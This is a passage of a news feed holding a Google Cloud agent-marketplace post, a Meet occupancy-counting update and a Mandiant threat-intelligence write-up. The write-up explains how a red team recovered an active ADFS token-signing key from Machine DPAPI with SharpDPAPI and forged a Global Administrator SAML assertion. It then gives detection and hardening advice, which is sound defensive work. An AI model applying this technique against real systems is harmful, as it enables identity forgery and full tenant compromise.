&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;An end user requests access to &lt;/span&gt;&lt;a href="https://console.cloud.google.com/marketplace/product/gcp-ec12b440/atlassian-rovo-agent"&gt;&lt;strong style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Atlassian Rovo&lt;/strong&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;, another agent available from Marketplace, directly from the Agent Gallery in the Gemini Enterprise app. In this demo scenario, the agent has already been procured from Marketplace, allowing the Discovery Engine Administrator to verify, integrate, and instantly grant access. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building agents for Gemini Enterprise and Google Cloud Marketplace as an AI Agent-as-a-Service solution provides a path to extend your reach and to get your agent into the daily workflow of millions of enterprise users. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We encourage you to start building today using tools like the &lt;/span&gt;&lt;a href="https://adk.dev/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Development Kit (ADK)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and to &lt;/span&gt;&lt;a href="https://cloud.google.com/marketplace/sell"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;learn more&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; about how you can accelerate your growth in the era of the agentic enterprise with Google Cloud Marketplace.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For any assistance, you can contact &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/marketplace/docs/partners/get-support"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Marketplace support team&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/publish-agents-in-gemini-enterprise-and-google-cloud-marketplace" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-07T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/occupancy-counting-now-available-for-Google-Meet-on-Neat-room-hardware.html</id>
    <title>Occupancy counting now available for Google Meet on Neat room hardware</title>
    <updated>2026-07-07T14:39:10+00:00</updated>
    <content type="html">&lt;p&gt;Occupancy counting is now available for Android-based Neat room hardware to help measure how meeting rooms are used. This feature brings the same occupancy counting capabilities found on ChromeOS devices to Android-based hardware.&lt;/p&gt;&lt;p&gt;Understanding room occupancy helps organizations optimize real estate and room design based on user needs. For instance, organizations can track if rooms with older video hardware are being avoided in favor of rooms equipped with better tracking cameras and audio bars.&lt;/p&gt;&lt;p&gt;Admins can review occupancy data in the Google Admin console and optionally download it as a spreadsheet. This feature does not collect or store any personally identifiable information (PII). Because occupancy detection processes data locally on the device, the camera LED indicator may remain off during counting depending on the hardware vendor. Refer to vendor documentation for device-specific information.&lt;/p&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiimw9WXdQNRdLrmfYCMYtoq2nuOBd7adGo4hHd_s1LyKsmqCvGr4Ms0EDB7rvl-y7iZN-HpMWSvYVIhcxFlISobBMZH61oXkGISq9vQZq3NBIiiyvI9hHFgcpk1-2bVr-I3OgSBsNSPyqfJ_5ZslbgoqNeqsz-YXCh-EyuJDwOmUc2BNpMq0jQR_DlEk/s1554/Occupancy%20counting%20now%20available%20for%20Google%20Meet%20on%20Neat%20room%20hardware%20-%207119.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiimw9WXdQNRdLrmfYCMYtoq2nuOBd7adGo4hHd_s1LyKsmqCvGr4Ms0EDB7rvl-y7iZN-HpMWSvYVIhcxFlISobBMZH61oXkGISq9vQZq3NBIiiyvI9hHFgcpk1-2bVr-I3OgSBsNSPyqfJ_5ZslbgoqNeqsz-YXCh-EyuJDwOmUc2BNpMq0jQR_DlEk/s1600/Occupancy%20counting%20now%20available%20for%20Google%20Meet%20on%20Neat%20room%20hardware%20-%207119.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Review room booking and occupancy in the Admin console&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; This feature will be off by default and can be enabled at the domain, organizational unit (OU), or group level. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/turn-on-occupancy-detection" target="_blank"&gt;learn more about turning on occupancy detection&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no end-user setting for this feature.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) started on July 6, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers with Google Meet on Neat AOSP hardware devices.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/turn-on-occupancy-detection" target="_blank"&gt;Turn on occupancy detection&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/track-room-and-device-usage-with-meet-hardware" target="_blank"&gt;Track room and device usage with Meet hardware&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/occupancy-counting-now-available-for-Google-Meet-on-Neat-room-hardware.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-07T14:39:10+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/recovering-active-adfs-signing-keys-machine-dpapi</id>
    <title>The ‘Ghost’ in the Database: Recovering Active ADFS Signing Keys via Machine DPAPI</title>
    <updated>2026-07-07T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Shebin Mathew&lt;/p&gt;
&lt;hr /&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The "Golden SAML" technique, first described by &lt;/span&gt;&lt;a href="https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CyberArk researchers&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in 2017, and further detailed by &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/abusing-replication-stealing-adfs-secrets-over-the-network"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Mandiant researchers in 2021&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, remains one of the most effective methods for threat actors to forge identity assertions in the Microsoft ecosystem. By obtaining the private key of an ADFS token-signing certificate, an attacker can authenticate as any user to any SAML-federated application, bypassing multifactor authentication (MFA), conditional access, and all identity-based controls.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, during a recent red team engagement, Mandiant discovered that when ADFS certificates are manually rotated, configuration drift can silently leave active signing keys exposed in Machine DPAPI. Specifically, Mandiant discovered &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;that in environments where AutoCertificateRollover is disabled and certificates are manually rotated, the database often becomes a 'ghost'—a record that still exists, still decrypts successfully, but references a certificate no longer used for token signing by the ADFS service. This attack vector warrants attention because the underlying configuration is commonly deployed in enterprise environments. The technique avoids direct interaction with components such as LSASS and the live ADFS service process, which are often subject to enhanced monitoring in enterprise environments, and may therefore result in lower visibility depending on the organization’s telemetry coverage. This post details how adversaries may exploit this TTP to forge high-privilege SAML tokens and provides the blueprint to defend against it.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Technical Insight: Encountering the ‘Ghost Certificate’&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Analysts followed the standard DKM extraction path, retrieving the encrypted blob from the WID database and decrypting it using the DKM material stored in Active Directory. The extraction succeeded, but the recovered certificate was no longer valid for token signing, and Entra ID rejected the resulting tokens with&lt;/span&gt; &lt;code style="vertical-align: baseline;"&gt;AADSTS500172&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; due to invalid signing material. Although structurally correct, the artifact is not usable for authentication, as the active signing key resides in the system’s machine-scoped cryptographic store, protected by Windows Machine DPAPI and managed through the operating system’s cryptographic subsystem. Successfully obtaining this active key allows an attacker to forge valid SAML assertions for any user, bypassing the need for user credentials and multi-factor authentication, and granting unauthorized access to any SAML-federated application including Microsoft 365 and Entra ID within the organization's environment.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Analysis revealed that&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AutoCertificateRollover&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;had been disabled and a manual rotation had been performed. Confirmation was obtained directly via&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Get-AdfsProperties&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, which returned&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AutoCertificateRollover: False&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;indicating that certificate lifecycle management had been delegated to manual administrative processes. While the ADFS service used a new valid key for signing, the WID configuration database was never updated to reflect the new certificate—leaving an expired "ghost" entry as the only record. This drift condition surfaces via Microsoft Event ID 385, which indicates certificate validity warnings in the ADFS service. Notably, this event self-resolves when&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AutoCertificateRollover&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;is re-enabled and a subsequent certificate rollover is performed; in environments where it is disabled and manual rotation is performed without a corresponding database update, it is the observable symptom of this drift condition.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="ADFS certificate enumeration output showing configuration drift between the WID database and the active host certificate" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ghost-database-fig1.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: ADFS certificate enumeration output showing configuration drift between the WID database and the active host certificate&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ADFS maintains private keys in two protection contexts. In &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Location 1 (User DPAPI)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, encrypted key blobs may exist on disk, but the DPAPI protection is tied to the service account's SID and associated DPAPI masterkey material. In the assessed environment, the domain DPAPI backup key approach successfully decrypted masterkey material for interactive user profiles, but returned no decryptable material associated with the ADFS service account profile. All subsequent offline decryption attempts similarly failed, consistent with the masterkey not being recoverable through the evaluated on-disk recovery approach in this environment—though this observation is bounded to the assessed environment and does not represent a universal architectural property of all ADFS deployments.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Location 2 (Machine RSA)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; does not rely on a user-specific logon session. Instead, the key material is protected using Machine DPAPI, leveraging the&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DPAPI_SYSTEM&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;LSA secret together with machine masterkeys available to sufficiently privileged SYSTEM-level contexts.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Why the WID Path Misses This Key&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In ADFS environments experiencing configuration drift—commonly arising during manual certificate rotations where&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AutoCertificateRollover&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;is disabled—the ADFS service host can successfully bind to a newly provisioned signing certificate at the operating-system level, ensuring continued service operation. However, the WID configuration database may not reflect the current signing certificate, resulting in stale certificate metadata.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This divergence between configuration and runtime state is the condition that ADFS Event ID 385 is designed to flag. As a consequence, extraction techniques that rely solely on the WID database and DKM material may return certificates that are no longer used for active signing, leading to rejected assertions in downstream federation scenarios.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Understanding How the Machine DPAPI Store Becomes Populated&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Understanding how the Machine DPAPI store becomes populated requires examining how ADFS persists its token-signing key material. During initial deployment, automatic certificate rollover, or manual certificate rotation, ADFS persists its RSA private key material in the machine-scoped CAPI key store at &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, protected using machine DPAPI context rather than a user-bound DPAPI context. SharpDPAPI&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/machine&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;enumeration in the assessed environment confirmed that the active machine key material resided under this path, while the CNG&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Crypto\Keys&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;store was not observed in use in the assessed environment.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The protection chain relies on the&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DPAPI_SYSTEM&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;LSA secret together with machine masterkeys associated with the S-1-5-18 security context, stored in&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;C:\Windows\System32\Microsoft\Protect\S-1-5-18\&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;as DPAPI-protected key material—both components ultimately resolvable only within highly privileged SYSTEM-level contexts on the host. The corresponding certificate is enrolled into the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;LocalMachine\My&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;certificate store, from which ADFS retrieves the associated private key during token-signing operations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The architectural rationale for machine-scoped key storage is operational resilience. A machine-scoped key remains usable across service account password changes, gMSA rotations, system reboots, and service restarts without requiring key reprovisioning or dependency on a specific interactive logon session. This design ensures that the ADFS service can consistently access the signing key regardless of changes to the underlying service account credentials.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, this same design choice has important security implications. Because the private key is protected using Machine DPAPI rather than a user-bound DPAPI context, a sufficiently privileged local process capable of accessing the machine key store and associated DPAPI artifacts may be able to recover the key material independently of the original service logon session. As a result, under certain conditions, recovery of the active ADFS token-signing private key may be achievable without direct interaction with LSASS memory or the live ADFS service process itself, potentially reducing visibility to defenses primarily focused on credential dumping or process-memory access behaviors.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 99.9641%;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="width: 98.1839%;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;KEY DESIGN IMPLICATION&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ADFS persists its token-signing private key material in the machine-scoped key store, protected using Machine DPAPI semantics. This is a documented behavior enabling machine-scoped key persistence that survives service account changes, credential rotations, and service restarts.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, this design introduces an operational security implication that is not commonly emphasized in standard ADFS hardening guidance: private keys stored within the machine key store are protected using this protection model and may be recoverable by a sufficiently privileged SYSTEM-level context through access to the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;DPAPI_SYSTEM&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; LSA secret and machine masterkeys available locally on the host.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a result, recovery of the active ADFS token-signing private key may be achievable without direct interaction with LSASS memory or the live ADFS service process itself, potentially reducing visibility to security controls primarily focused on credential dumping or process-memory access behaviors.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Attack Flow: Machine DPAPI Key Recovery to SAML Forgery&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Machine DPAPI extraction flow—five-step process from SYSTEM execution to SAML assertion" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ghost-database-fig2.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 2: Machine DPAPI extraction flow—five-step process from SYSTEM execution to SAML assertion&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="‘SharpDPAPI /machine’ output confirming successful recovery of the active ADFS token-signing private key from the machine DPAPI store" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ghost-database-fig3.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 3: ‘SharpDPAPI /machine’ output confirming successful recovery of the active ADFS token-signing private key from the machine DPAPI store&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The recovered key was used to forge a SAML assertion impersonating a Global Administrator identity, which Entra ID accepted as a valid authentication assertion, resulting in authenticated access at &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Global Administrator&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; privilege level within the federated Microsoft 365 tenant.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Detection and Hunting&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Defenders should prioritize visibility into operating system-level cryptographic operations and identity issuance behavior, rather than relying solely on application-layer configuration stores.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SACL-Based Object Access Monitoring:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Configure object access auditing via SACLs on&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;and&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;C:\Windows\System32\Microsoft\Protect\S-1-5-18\&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;When configured correctly, this generates &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Security Event ID 4663&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for file access attempts. Coverage depends on SACL configuration and access paths; treat this as supporting evidence in correlation-based detection rather than a stand-alone signal.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;ADFS Token Issuance Consistency:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Monitor for inconsistencies between primary authentication events and token issuance events in ADFS audit logs. Relevant events include token issuance and claims processing records (Event IDs 299, 1200-series, depending on ADFS version and audit configuration). The objective is to identify token issuance that cannot be clearly correlated to a preceding authentication context. This is most effective when normal authentication patterns per relying party trust are baselined.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Federated Identity Monitoring in Entra ID:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Entra ID sign-in logs will record an accepted forged assertion as a standard federated sign-in event. Detection requires cross-correlating Entra ID sign-in records against ADFS-side issuance logs—neither source in isolation is sufficient. For privileged accounts, focus on unexpected Internet Protocol (IP) ranges, claim set deviations,and user-agent inconsistencies.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Mitigation and Remediation&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ADFS infrastructure should be treated as Tier 0 identity infrastructure, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;equivalent in criticality to Domain Controllers&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. If SYSTEM access is achieved on an ADFS host, the signing key must be considered compromised.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Hardware-Backed Key Protection:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Migrate token-signing certificates to a Hardware Security Module (HSM). HSM-backed keys ensure private key material does not exist in software-accessible storage on the host, eliminating the Machine DPAPI extraction path entirely.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;gMSA Service Identity:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Run ADFS services using Group Managed Service Accounts to automate credential rotation and reduce operational drift in service identity management. While this does not directly address machine-scoped key protection, it eliminates manual credential management as a contributing factor to configuration drift.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Tier 0 Administrative Controls:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Govern ADFS servers with strict Tier 0 controls: restricted administrative access pathways, dedicated Privileged Access Workstations (PAWs), separation from general server administration domains, and enhanced privileged access monitoring.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Certificate Rotation and Configuration Validation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; If compromise is suspected, rotate the token-signing certificate and validate consistency across ADFS configuration, the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;LocalMachine\My&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;store, and federation metadata. Do not rely on a single source of truth. For environments with AutoCertificateRollover disabled, manual rotation must include updating ADFS via &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Set-AdfsCertificate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;—installing the certificate alone is insufficient. Validate using&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; Get-AdfsCertificate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; after rotation. If Event ID 385 appears afterward, investigate for configuration inconsistency. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Multicloud Scope Awareness:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A compromised ADFS token-signing key affects all SAML relying party trusts, not just Microsoft services. Organizations using ADFS for identity federation across other software-as-a-service (SaaS) platforms should treat ADFS as Tier 0 infrastructure and audit all relying party trusts. Migrating away from ADFS-based federation (e.g., to native OIDC federation) removes this specific attack path.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/recovering-active-adfs-signing-keys-machine-dpapi" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-07T14:00:00+00:00</published>
  </entry>
  <entry>
